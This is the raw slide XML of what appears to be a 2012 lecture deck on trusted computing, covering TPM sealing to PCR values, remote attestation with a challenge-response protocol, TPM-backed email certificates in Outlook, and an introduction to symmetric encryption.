        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1572064" y="3320716"/>
            <a:ext cx="5732889" cy="3357993"/>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Encrypting Large Pieces of Data</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Two options:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>1. The platform can encrypt the large piece of secret data using a one-time symmetric key. The platform can then use the TPM to protect the one-time symmetric key.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>2. The platform can render the large piece of secret data as smaller blocks of secret data and then use the TPM to encrypt each of the smaller blocks.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12/19/2012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Binding Data to the Platform</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="230736" y="1350235"/>
            <a:ext cx="4275276" cy="5323941"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="55000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>“Sealing”: binds data to a certain value of the PCR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>TPM will only release the decryption (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>unseal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>) if PCR value is the same as when encryption happened (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>seal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Platform SW/HW configuration is calculated by the TPM software stack and stored into the Platform Configuration Registers (PCR) available within the TPM.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>TPM merges the data together with the values contained in one or more PCR registers and then encrypts the combination as a whole. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>When the secret data needs to be accessed, the values of the necessary platform configurations are calculated and the data is released for use only if the calculated and stored values match.</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12/19/2012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65</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6146" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4370755" y="2530657"/>
            <a:ext cx="4773245" cy="3191414"/>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smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Attestation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7171" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566738" y="1159498"/>
            <a:ext cx="8001000" cy="5088902"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Basic model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Certificate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="-25000" dirty="0" err="1" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>hw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> on signing key </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="-25000" dirty="0" err="1" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>sign</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" baseline="-25000" dirty="0" smtClean="0">
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Application A generates key pair PK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="-25000" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>, SK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="-25000" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Certificate C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="-25000" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> on PK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="-25000" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>hash of executable image </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>of A using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="-25000" dirty="0" err="1" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>sign</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" baseline="-25000" dirty="0" smtClean="0">
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>A attests its validity to remote server by sending </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="-25000" dirty="0" err="1" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>hw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> and C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="-25000" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Remote server checks certificates and whether application hash in C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="-25000" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> is trusted</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Attestation (Platform Authentication)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226242" y="1350236"/>
            <a:ext cx="8917757" cy="3325459"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Challenge-response protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Integrity reporting: report the value of the PCR</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="日期占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{43978029-9DF7-7445-88EF-08A8BCC03D5B}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>12/19/2012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67</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="24" name="Group 15"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1142216" y="3842994"/>
            <a:ext cx="7087384" cy="1784808"/>
            <a:chOff x="1056" y="2697"/>
            <a:chExt cx="4128" cy="663"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Text Box 4"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1056" y="2697"/>
              <a:ext cx="912" cy="171"/>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400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:sysClr val="windowText" lastClr="000000"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                </a:rPr>
                <a:t>Challenger</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="Text Box 7"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3312" y="2697"/>
              <a:ext cx="1872" cy="171"/>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400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:sysClr val="windowText" lastClr="000000"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                </a:rPr>
                <a:t>Trusted Platform Agent</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="Line 8"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1680" y="3024"/>
              <a:ext cx="1968" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd type="triangle" w="lg"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ysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="Text Box 10"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2304" y="2784"/>
              <a:ext cx="576" cy="149"/>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ea typeface="宋体" pitchFamily="2" charset="-122"/>
                </a:rPr>
                <a:t>nonce</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="Line 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="1680" y="3360"/>
              <a:ext cx="1968" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd type="triangle" w="lg"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ysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="Text Box 13"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1728" y="3120"/>
              <a:ext cx="2016" cy="149"/>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ea typeface="宋体" pitchFamily="2" charset="-122"/>
                </a:rPr>
                <a:t>Sign</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="-25000" noProof="0" smtClean="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:sysClr val="windowText" lastClr="000000"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                </a:rPr>
                <a:t>ID</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:sysClr val="windowText" lastClr="000000"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                </a:rPr>
                <a:t>(nonce, PCR, log), C</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="-25000" noProof="0" smtClean="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:sysClr val="windowText" lastClr="000000"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                </a:rPr>
                <a:t>ID</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="Rectangle 14"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4128" y="3024"/>
              <a:ext cx="480" cy="240"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="CC0000">
                <a:alpha val="10196"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="CC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smtClean="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:sysClr val="windowText" lastClr="000000"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                </a:rPr>
                <a:t>TPM</a:t>
              </a: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12/19/2012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68</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="394981" y="1404594"/>
            <a:ext cx="8447392" cy="5128181"/>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Example Application (Microsoft Outlook)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="230736" y="1246539"/>
            <a:ext cx="8665436" cy="2345071"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Figure shows how the TPM can be used through Microsoft Outlook to acquire an email signing/encryption certificate from a TTP such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Verisign</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>*, and carry out email signing and encryption.</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12/19/2012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69</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8194" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-1" y="3496865"/>
            <a:ext cx="4845377" cy="3120752"/>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5015060" y="3506192"/>
            <a:ext cx="4128940" cy="3166316"/>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7314" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Secret-Key </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cryptography</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1037315" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1828800"/>
            <a:ext cx="8686800" cy="2989006"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="15000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Private Key (Symmetric) Encryption:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="15000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Single key used for both encryption and decryption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="15000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Plaintext:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Unencrypted Version of message</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="15000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ciphertext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Encrypted Version of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>message</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
